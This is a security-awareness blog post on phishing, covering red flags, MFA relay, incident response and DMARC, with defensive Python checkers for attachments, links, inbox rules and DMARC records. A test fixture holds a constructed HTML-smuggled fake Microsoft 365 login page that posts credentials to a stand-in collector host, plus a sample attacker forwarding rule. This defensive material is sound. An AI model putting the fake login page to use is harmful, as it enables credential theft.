One Phishing Email Cost This Company $100 Million

In 2019, a Lithuanian man named Evaldas Rimasauskas pleaded guilty to stealing over $100 million from Google and Facebook using nothing more than forged invoices and carefully crafted emails. Between 2013 and 2015 he impersonated Quanta Computer, a Taiwanese hardware vendor both companies actually did business with, sent fake invoices and contracts to their accounts payable departments, and had the payments wired to bank accounts he controlled. The two companies eventually clawed most of the money back, but only after it had already left. No malware. No zero-day exploit. Just a convincing email and a target who didn't look twice.

That's the reality I've been explaining to organizations for over a decade. The most expensive cybersecurity incidents don't start with sophisticated hacking. They start with someone opening an email and making a split-second decision to trust it.

This post breaks down exactly how phishing emails work, what they look like in 2026, and — most importantly — what you and your team can do to stop them before they become a seven-figure problem.

What Is a Phishing Email, Exactly?

A phishing email is a fraudulent message designed to trick the recipient into revealing sensitive information, clicking a malicious link, or downloading harmful attachments. It's social engineering delivered to your inbox. The threat actor behind it is impersonating someone you trust — your bank, your boss, a vendor, or a platform like Microsoft 365.

According to the Verizon Data Breach Investigations Report, phishing remains one of the top initial access vectors in confirmed data breaches year after year. The FBI's IC3 received over 298,000 phishing complaints in 2023 alone, making it the most reported cybercrime category by a wide margin.

Here's what separates phishing from spam: intent. Spam is annoying. Phishing is adversarial. A threat actor has a specific goal — credential theft, ransomware deployment, wire fraud, or data exfiltration — and your inbox is the entry point.

The Anatomy of a Modern Phishing Email

I've reviewed thousands of phishing emails in incident response engagements. The old "Nigerian prince" template is dead. Today's phishing emails are polished, personalized, and nearly indistinguishable from legitimate correspondence. Here's what makes them work.

Spoofed Sender Addresses

Threat actors register domains that look almost identical to the real thing. Instead of microsoft.com you might see micros0ft-support.com (a zero for the "o"), or microsoft.com.mailserver99.net, where the familiar name is just a subdomain and the part that actually matters is the rightmost one, mailserver99.net. Cheaper still is display-name spoofing: the From header reads "Microsoft Support" while the address behind it is a throwaway mailbox, and most mobile clients show only the name. And some attackers compromise legitimate accounts outright, so the From address is 100% authentic and passes every authentication check. That's why you can't rely on the sender address alone.

Urgency and Authority

The most effective phishing emails create pressure. "Your account will be suspended in 24 hours." "The CEO needs this wire transfer completed before end of business." "Your password has been compromised — reset immediately." These messages exploit your instinct to act fast and ask questions later.

Convincing Landing Pages

Click the link in a modern phishing email and you'll land on a page that looks pixel-perfect. Attackers clone login portals from Microsoft, Google, banks, and HR platforms. They use valid TLS certificates, free from any public CA, so you'll even see the padlock icon; the padlock only proves the connection is encrypted, not that the site is who it claims to be. I've seen credential harvesting pages hosted on legitimate cloud services like Azure and AWS, which makes URL filtering almost useless without deeper inspection.

Malicious Attachments

PDFs with embedded links, Excel files with macro payloads, HTML attachments that render a fake login page locally in your browser: these are all standard tactics. In my experience the HTML attachment method has surged in the last two years, and the reason is simple. The attachment often contains nothing but a script and an encoded blob; the fake login page is assembled in the browser only when the user opens the file (a technique known as HTML smuggling), so the gateway never sees a URL it can reputation-check or a form it can inspect.
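An added example (my code, not from the original post) of what a static triage of an HTML attachment can look like, and why the smuggling technique works: the malicious sample below is constructed so that the visible markup contains no form at all, only a script that decodes a base64 blob when the file is opened. The checker flags the decoder call and the blob, then decodes the blob itself and rescans it, which is the step a naive gateway skips. The brand list, the indicator strings and both sample files are assumptions:

```python
"""Static triage of an HTML email attachment for credential-harvesting traits.

Added example, not code from the original post. Both attachments below are
constructed samples; BRANDS and the indicator lists are assumptions.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: brand names whose login pages are commonly cloned.
BRANDS = ("microsoft", "office 365", "google", "docusign", "dropbox")
# A run of 200+ base64 characters is a strong hint the real page is smuggled in.
_B64_BLOB = re.compile(r"[A-Za-z0-9+/=]{200,}")
# Runtime decoders/writers a scanner would have to execute to see the page.
_DECODERS = ("atob(", "unescape(", "fromCharCode(", "document.write(")


class _Page(HTMLParser):
    """Pull out form targets, input types, script bodies and the title."""

    def __init__(self):
        super().__init__()
        self.forms, self.inputs, self.scripts, self.title = [], [], [], ""
        self._inside = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append(a.get("action", ""))
        elif tag == "input":
            self.inputs.append(a.get("type", "text").lower())
        elif tag in ("script", "title"):
            self._inside = tag

    def handle_endtag(self, tag):
        if tag == self._inside:
            self._inside = None

    def handle_data(self, data):
        if self._inside == "script":
            self.scripts.append(data)
        elif self._inside == "title":
            self.title += data


def analyze_html_attachment(html: str, _depth: int = 0) -> list[str]:
    """Return findings; an empty list means no harvesting indicators were seen."""
    page = _Page()
    page.feed(html)
    findings = []
    if "password" in page.inputs:
        findings.append("renders a password prompt locally")
    for action in page.forms:
        host = urlparse(action).hostname
        if host:  # absolute action: typed credentials leave the machine to this host
            findings.append(f"form posts credentials to {host}")
    script = "\n".join(page.scripts)
    for marker in _DECODERS:
        if marker in script:
            findings.append(f"builds content at runtime via {marker}")
    blob = _B64_BLOB.search(html)
    if blob:
        findings.append("carries a large base64 blob (HTML smuggling)")
        # Do what the browser would do: decode the blob and scan the result too.
        try:
            inner = base64.b64decode(blob.group(0), validate=True).decode("utf-8", "replace")
        except ValueError:
            inner = ""
        if inner and _depth < 2:
            findings += ["in decoded payload: " + f for f in analyze_html_attachment(inner, _depth + 1)]
    for brand in BRANDS:
        if brand in page.title.lower():
            findings.append(f"title impersonates {brand}")
            break
    return findings


# Constructed malicious sample: the login form exists only inside the blob and is
# written into the page at open time, so the delivered markup has no form to inspect.
_SMUGGLED_PAGE = base64.b64encode(
    b"<html><body style='font-family:Segoe UI'><h2>Microsoft 365</h2>"
    b"<p>Session expired. Sign in again to view the shared document.</p>"
    b"<form method='POST' action='https://collector.sketchydomain.ru/o365'>"
    b"<input type='email' name='login' placeholder='Email'>"
    b"<input type='password' name='passwd' placeholder='Password'>"
    b"<input type='submit' value='Sign in'></form></body></html>"
).decode()
MALICIOUS_HTML = f"""<html><head><title>Microsoft 365 - Sign in</title></head><body>
<div id="app">Loading secure document...</div>
<script>document.getElementById("app").innerHTML = atob("{_SMUGGLED_PAGE}");</script>
</body></html>"""

# Constructed benign sample: a plain HTML newsletter with no forms or scripts.
BENIGN_HTML = """<html><head><title>Weekly digest</title></head><body>
<h1>This week</h1><p>Three new articles and a webinar recording.</p>
</body></html>"""

if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_HTML), ("benign", BENIGN_HTML)):
        print(name, analyze_html_attachment(doc) or ["clean"])
```

Real kits layer further tricks on top (XOR or custom encodings, content split across several variables, the blob fetched from a remote host), which is why sandbox detonation of HTML attachments, or simply blocking them at the gateway, beats any static rule set.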

The $4.88M Lesson Most Organizations Learn Too Late

IBM's Cost of a Data Breach Report pegged the global average cost of a data breach at $4.88 million in 2024. Phishing was consistently among the top initial attack vectors. That cost includes forensic investigation, legal fees, regulatory fines, notification expenses, and the hardest one to quantify — reputational damage.

But here's what I want you to internalize: the breach doesn't start with the phishing email. It starts with the click. And the click happens because your people weren't trained to recognize the threat.

That's why I built our phishing awareness training for organizations — to give your employees realistic, scenario-based practice identifying phishing emails before a real one hits their inbox.

5 Red Flags That Expose a Phishing Email

I train people to look for these five signals every time they open a message. None of them alone is definitive, but two or more together should trigger immediate suspicion.

1. Mismatched URLs

Hover over every link before you click. If the display text says "Microsoft Login" but the actual URL points to login-msft.sketchydomain.ru, that's your answer. On mobile, long-press the link to preview it. Two caveats: if your email security product rewrites links, the hover shows the gateway's domain rather than the destination, and shorteners and redirect chains hide the final target entirely, so treat an unfamiliar or opaque URL as a reason to reach the site by typing its address yourself. This single habit still stops a large share of link-based phishing.
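As an added example (not code from the original post), here is a small Python checker that applies the hover test automatically to an email's HTML body and also catches the two domain tricks described earlier, a trusted name buried as a subdomain and a digit-for-letter lookalike. The sample body, the TRUSTED_DOMAINS list, the homoglyph table and the two-label registered-domain rule are all assumptions for illustration:

```python
"""Link-mismatch and lookalike-domain checks for an email's HTML body.

Added example, not code from the original post. The HTML body below is a
constructed sample; TRUSTED_DOMAINS, the homoglyph table and the two-label
registered-domain rule are simplifying assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the brands whose login pages this organisation actually uses.
TRUSTED_DOMAINS = {"microsoft.com", "login.microsoftonline.com", "google.com"}

# Assumption: common digit-for-letter swaps seen in lookalike registrations.
_SWAPS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})
_DOMAIN_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.IGNORECASE)


class _Anchors(HTMLParser):
    """Collect (href, visible text) pairs from every <a> tag."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join(self._text).strip()))
            self._href = None


def registered_domain(host: str) -> str:
    """Last two labels of a hostname. Assumption: no public-suffix list, so
    example.co.uk would be mis-split; use tldextract in production."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def canonical(label: str) -> str:
    """Undo the substitutions attackers use: micros0ft -> microsoft, rn -> m."""
    return label.lower().translate(_SWAPS).replace("rn", "m").replace("vv", "w")


def assess_link(href: str, text: str) -> list[str]:
    """Return human-readable findings for one link; an empty list means clean."""
    findings = []
    host = (urlparse(href).hostname or "").lower()
    if not host:
        return findings
    target = registered_domain(host)
    trusted = {registered_domain(d) for d in TRUSTED_DOMAINS}

    # 1. The visible text names one domain, the href goes somewhere else.
    shown = _DOMAIN_RE.search(text)
    if shown and registered_domain(shown.group(0)) != target:
        findings.append(f"text shows {registered_domain(shown.group(0))}, link goes to {target}")

    if target in trusted:
        return findings

    # 2. A trusted domain buried as a subdomain: microsoft.com.mailserver99.net.
    #    Only the rightmost labels (mailserver99.net) decide where you end up.
    for t in trusted:
        if f".{t}." in f".{host}":
            findings.append(f"{t} is only a subdomain here; real domain is {target}")

    # 3. Lookalike of a trusted brand label: micros0ft-support.com, paypa1.com.
    brands = {t.split(".")[0] for t in trusted}
    for piece in canonical(target.split(".")[0]).split("-"):
        if piece in brands:
            findings.append(f"{target} resembles the brand '{piece}'")
            break
    return findings


def scan_email_html(html: str) -> dict[str, list[str]]:
    """Map each suspicious href in the body to its findings."""
    parser = _Anchors()
    parser.feed(html)
    report = {}
    for href, text in parser.links:
        findings = assess_link(href, text)
        if findings:
            report[href] = findings
    return report


# Constructed sample body: one legitimate link followed by three phishing patterns.
SAMPLE_HTML = """
<p>Please <a href="https://login.microsoftonline.com/">sign in</a> to keep your mailbox active.</p>
<p>Or use this link: <a href="https://login-msft.sketchydomain.ru/">https://login.microsoftonline.com/</a></p>
<p><a href="https://microsoft.com.mailserver99.net/reset">Reset your password</a></p>
<p><a href="http://micros0ft-support.com/verify">Contact Microsoft Support</a></p>
"""

if __name__ == "__main__":
    for href, findings in scan_email_html(SAMPLE_HTML).items():
        print(href, "->", "; ".join(findings))
```

The two-label rule is deliberately naive; in production use a public-suffix-aware library such as tldextract. Note also that a link sent from a compromised legitimate account to a legitimate-looking file share produces no findings here at all, which is exactly why the other red flags still matter.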

2. Generic Greetings in Targeted Context

If your "bank" emails you with "Dear Customer" instead of your actual name, be suspicious. Legitimate services almost always personalize communications. That said, sophisticated spear-phishing will use your real name — so this is a starting indicator, not a final verdict.

3. Grammar and Formatting Inconsistencies

This red flag is less reliable than it used to be. Generative AI has dramatically improved the quality of phishing copy. But you'll still catch inconsistencies: mismatched fonts, incorrect logos, unusual spacing, or British English in a message supposedly from an American company. Pay attention to the details.

4. Unexpected Attachments

If you didn't request a document and weren't expecting one, don't open it. This is especially true for file types like .html, .exe, .iso, and macro-enabled Office files (.xlsm, .docm). Call the sender directly using a known phone number to verify.

5. Pressure Tactics and Emotional Manipulation

Any email that demands immediate action, threatens consequences, or creates a sense of panic is designed to bypass your critical thinking. "Your account has been compromised" and "Failure to respond will result in legal action" are classic examples. Legitimate organizations give you time and multiple channels to respond.

Why Email Filters Alone Won't Save You

I hear this constantly: "We have a secure email gateway. We're covered." No, you're not. Email security tools are essential, but they're not infallible. Here's why.

Threat actors test their payloads against popular email filters before launching campaigns. They hide the destination behind link shorteners and redirect chains, and they point links at a harmless page at delivery time, switching it to the phishing kit hours later once the gateway's scan is done. And mail sent from a compromised legitimate account passes SPF, DKIM, and DMARC cleanly, because those checks authenticate the sending domain, not the intent of the message.

CISA has repeatedly emphasized that technical controls must be paired with human-layer defenses. Your email filter is a safety net. Security awareness is the guardrail that keeps people off the cliff in the first place.

Building a Human Firewall Against Phishing

Technical defenses reduce volume. Training reduces impact. You need both. Here's the practical framework I recommend to every organization I work with.

Deploy Phishing Simulations Regularly

Monthly phishing simulations are the single most effective training tool I've seen. Not annual. Not quarterly. Monthly. The goal isn't to punish people who click — it's to build pattern recognition through repetition. Track click rates, report rates, and credential submission rates over time. You should see improvement within 90 days.

Implement Multi-Factor Authentication Everywhere

MFA is your most important technical backstop, but it is not a wall. Adversary-in-the-middle phishing kits proxy the real login page, relay the password and the one-time code or push approval in real time, and walk away with the resulting session cookie, so SMS codes, authenticator-app codes and push prompts can all be defeated by a convincing phishing page. Prioritize phishing-resistant methods, meaning FIDO2/WebAuthn security keys and passkeys: the credential is bound to the legitimate site's origin, so a lookalike domain gets nothing. SMS is the weakest option of all, exposed to both relay and SIM-swapping.

Adopt Zero Trust Principles

Zero trust means "never trust, always verify" — whether the request comes from inside or outside your network. Apply least-privilege access, segment your network, and require continuous authentication. A phishing email that compromises one set of credentials should not give a threat actor the keys to the kingdom.

Create a Reporting Culture

Your employees need a one-click way to report suspicious emails, and they need to know that reporting is rewarded, not penalized. Organizations with strong reporting cultures catch phishing campaigns faster and contain breaches earlier. Install a "Report Phish" button in your email client and celebrate the people who use it.

Train Continuously, Not Annually

Compliance-driven annual training checks a box. It doesn't change behavior. Effective cybersecurity awareness training delivers short, frequent, scenario-based lessons that keep phishing recognition top of mind. Pair it with simulated phishing exercises for maximum impact.

What to Do When Someone Clicks a Phishing Email

It's going to happen. Even in well-trained organizations, someone will eventually click. Your response speed determines whether it's an incident or a catastrophe.

Immediate steps:

  • Decide whether the device is in scope. If the user only typed credentials into a web page, the laptop is usually fine and the account is the problem. If an attachment was opened or a download ran, isolate the device: use your EDR's network-isolation feature so it stays reachable for investigation, or pull Ethernet and Wi-Fi if you don't have one.
  • Revoke every active session and refresh token for the account in your identity provider, then reset the password from a separate, known-clean device. Do both: a password reset on its own does not always invalidate sessions the attacker already holds. Include any account that shares the same password.
  • Hunt for persistence in the identity and the mailbox. Check inbox rules (attackers create forwarding and delete rules to keep reading mail after a reset), newly registered MFA devices or phone numbers, OAuth application consents, and mailbox delegations, and remove anything the user didn't create.
  • Scan the device with your EDR tool and quarantine it if anything is detected.
  • Find everyone else who received the same message, purge it from their mailboxes, and block the sender and the URL at the gateway and proxy.
  • Notify your security team or managed security provider. Document everything, including timestamps.

If credentials were entered on a phishing page, assume they're compromised. If the phishing email contained a ransomware payload, activate your incident response plan and consider engaging legal counsel before paying any ransom demand.
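Of the steps above, the inbox-rule check is the one people most often skip, so here is an added example (not from the original post) of automating it in Python. It evaluates a constructed set of rules shaped like Microsoft Graph messageRule objects (what GET /users/{id}/mailFolders/inbox/messageRules returns); the ORG_DOMAINS set, the keyword list and the sample rules are assumptions for illustration:

```python
"""Triage a mailbox's inbox rules for the persistence tricks BEC actors leave behind.

Added example, not code from the original post. The rules below are a
constructed sample shaped like Microsoft Graph messageRule objects;
ORG_DOMAINS and HIDE_KEYWORDS are assumptions to adapt to your environment.
"""
import json

ORG_DOMAINS = {"example.com"}  # assumption: your own mail domains
# Assumption: subjects an intruder wants the victim never to see.
HIDE_KEYWORDS = {"invoice", "payment", "wire", "bank", "password", "hacked",
                 "phishing", "suspicious", "security", "mfa"}

# Constructed sample export: one normal rule, one attacker rule, one disabled forward.
SAMPLE_RULES_JSON = """[
  {"id": "r1", "displayName": "Project updates", "isEnabled": true, "sequence": 1,
   "conditions": {"subjectContains": ["Project Atlas"]},
   "actions": {"moveToFolder": "AAMkAGI2folderid", "markAsRead": true}},
  {"id": "r2", "displayName": ".", "isEnabled": true, "sequence": 2,
   "conditions": {"bodyOrSubjectContains": ["invoice", "payment", "wire", "hacked"]},
   "actions": {"forwardTo": [{"emailAddress": {"address": "ap.archive@mail-archive.example", "name": "Archive"}}],
               "delete": true, "markAsRead": true, "stopProcessingRules": true}},
  {"id": "r3", "displayName": "Vacation forward", "isEnabled": false, "sequence": 3,
   "conditions": {},
   "actions": {"redirectTo": [{"emailAddress": {"address": "me@personalmail.example"}}]}}
]"""


def _external(recipients) -> list[str]:
    """Addresses outside ORG_DOMAINS from a Graph recipient list."""
    out = []
    for r in recipients or []:
        addr = r.get("emailAddress", {}).get("address", "").lower()
        if addr and addr.rsplit("@", 1)[-1] not in ORG_DOMAINS:
            out.append(addr)
    return out


def triage_rule(rule: dict) -> list[str]:
    """Findings for one rule; an empty list means nothing to look at."""
    findings = []
    actions = rule.get("actions") or {}
    conds = rule.get("conditions") or {}
    name = (rule.get("displayName") or "").strip()

    # 1. Mail leaving the organisation: the classic BEC mailbox-monitoring setup.
    for key in ("forwardTo", "forwardAsAttachmentTo", "redirectTo"):
        for addr in _external(actions.get(key)):
            findings.append(f"{key} external address {addr}")

    # 2. Hiding evidence: delete or move messages that mention money or security.
    hides = actions.get("delete") or actions.get("permanentDelete") or actions.get("moveToFolder")
    words = {w.lower() for key in ("subjectContains", "bodyContains", "bodyOrSubjectContains")
             for w in conds.get(key, [])}
    hit = words & HIDE_KEYWORDS
    if hides and hit:
        findings.append(f"hides mail matching {sorted(hit)}")

    # 3. Names like ".", "," or "" are chosen to disappear in the rules list.
    if not any(c.isalnum() for c in name):
        findings.append(f"rule name {name!r} looks deliberately inconspicuous")

    # A disabled rule is still worth a look: the attacker can re-enable it later.
    if findings and not rule.get("isEnabled", True):
        findings = ["(disabled) " + f for f in findings]
    return findings


def triage_mailbox(rules_json: str) -> dict[str, list[str]]:
    """Map rule id -> findings for every rule that deserves a human look."""
    report = {}
    for rule in json.loads(rules_json):
        findings = triage_rule(rule)
        if findings:
            report[rule["id"]] = findings
    return report


if __name__ == "__main__":
    for rule_id, findings in triage_mailbox(SAMPLE_RULES_JSON).items():
        print(rule_id, "->", "; ".join(findings))
```

Run it over every mailbox in the tenant, not just the one that clicked: the same actor often plants identical rules in the mailboxes of the finance staff they later impersonate.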

Phishing in 2026: What's Changed

The phishing landscape has shifted significantly. Here's what I'm seeing in the field right now.

AI-Generated Phishing at Scale

Generative AI tools have eliminated the language barrier that once made many phishing emails easy to spot. Threat actors now generate grammatically flawless, contextually appropriate phishing emails in any language, at volume. The days of catching phishing by looking for typos are largely behind us.

QR Code Phishing (Quishing)

Attackers embed malicious QR codes in emails, bypassing traditional URL scanning. The recipient scans the code with their phone — which typically lacks the same security controls as their work laptop — and lands on a credential harvesting page. I've seen these disguised as MFA setup instructions, parking notifications, and HR benefit enrollment forms.

Business Email Compromise Remains Dominant

The FBI IC3 consistently ranks business email compromise (BEC), a targeted form of phishing, among the costliest cybercrime categories it tracks: in the 2023 and 2024 reports it was second only to investment fraud, with well over $2.5 billion in reported losses each year. These attacks don't use malware. They use trust, urgency, and impersonation to redirect legitimate business payments to attacker-controlled accounts.

Your Phishing Defense Checklist

Here's the practical summary you can hand to your leadership team or IT department today:

  • Deploy phishing-resistant MFA on all accounts, prioritizing email and financial systems.
  • Run monthly phishing simulations and track metrics over time.
  • Implement a "Report Phish" button in all email clients.
  • Enable SPF, DKIM, and DMARC on your email domain and work up to a reject policy: start at p=none with aggregate reporting (rua) to find legitimate senders you forgot about, move to quarantine, then reject. Remember that these checks protect your domain against spoofing; they do nothing about mail from an attacker sitting in a compromised legitimate account.
  • Restrict macro execution in Office documents via group policy. Office already blocks macros in files downloaded from the internet by default, but enforce the "Block macros from running in Office files from the Internet" policy so users can't click through the warning.
  • Train employees with realistic, scenario-based content — not slide decks.
  • Establish and rehearse an incident response plan for credential compromise.
  • Apply zero trust architecture principles to limit blast radius.
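For the DMARC item in the checklist, an added example (not from the original post) that grades a DMARC TXT record against the reject-policy target and spells out what each weaker setting leaves open. The four sample records are constructed; the finding text is my own:

```python
"""Grade a DMARC TXT record against the 'reject policy' target in the checklist.

Added example, not code from the original post. The records below are
constructed samples; the wording of each finding is my own.
"""

_STRENGTH = {"none": 0, "quarantine": 1, "reject": 2}


def parse_dmarc(record: str) -> dict[str, str]:
    """Split 'v=DMARC1; p=reject; rua=mailto:...' into a tag dictionary."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def check_dmarc(record: str) -> dict:
    """Return {'valid', 'policy', 'findings'}; an empty findings list is the goal."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return {"valid": False, "policy": None,
                "findings": ["not a DMARC record (needs v=DMARC1 first)"]}
    policy = tags.get("p", "").lower()
    if policy not in _STRENGTH:
        return {"valid": False, "policy": None,
                "findings": ["p= tag missing or invalid; receivers ignore the record"]}

    findings = []
    if policy == "none":
        findings.append("p=none: monitoring only, spoofed mail is still delivered")
    elif policy == "quarantine":
        findings.append("p=quarantine: spoofed mail goes to junk instead of being refused")

    # pct defaults to 100; a lower value applies the policy to a sample of failing
    # mail and the remainder gets the next weaker policy (reject -> quarantine).
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 100
    if policy != "none" and pct < 100:
        findings.append(f"pct={pct}: only {pct}% of failing mail gets the {policy} policy")

    # sp defaults to p; an explicit weaker sp leaves every subdomain open to spoofing.
    sub = tags.get("sp", policy).lower()
    if _STRENGTH.get(sub, 0) < _STRENGTH[policy]:
        findings.append(f"sp={sub}: subdomains are weaker than the organisational domain")

    if not tags.get("rua"):
        findings.append("no rua=: without aggregate reports you cannot see who is spoofing you")
    return {"valid": True, "policy": policy, "findings": findings}


# Constructed records illustrating the rollout path: monitor -> partial -> full.
SAMPLE_RECORDS = {
    "monitoring": "v=DMARC1; p=none; rua=mailto:dmarc@example.com",
    "half-way": "v=DMARC1; p=reject; sp=none; pct=50",
    "target": "v=DMARC1; p=reject; rua=mailto:dmarc@example.com; adkim=s; aspf=s",
    "not-dmarc": "v=spf1 include:_spf.example.com ~all",
}

if __name__ == "__main__":
    for label, rec in SAMPLE_RECORDS.items():
        print(label, check_dmarc(rec))
```

Feed it the output of `dig TXT _dmarc.yourdomain.com +short`. A clean grade means your domain is hard to spoof, nothing more; mail sent from a compromised mailbox inside your own tenant passes DMARC by definition, which is why the rest of the checklist exists.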

Every one of these controls reduces your exposure. Combined, they make your organization a significantly harder target.

Start Training Before the Next Phishing Email Lands

I've investigated breaches that started with a single phishing email sent on a Tuesday afternoon to a mid-level employee who was distracted, busy, and had never seen a simulated phish in their life. That's the scenario I want you to prevent.

Enroll your team in our phishing awareness training program to give them hands-on practice with realistic phishing scenarios. And if you're building a broader security culture, our cybersecurity awareness training covers everything from social engineering to ransomware defense.

The next phishing email targeting your organization is already being drafted. The question is whether your people will recognize it — or fund someone's next payday.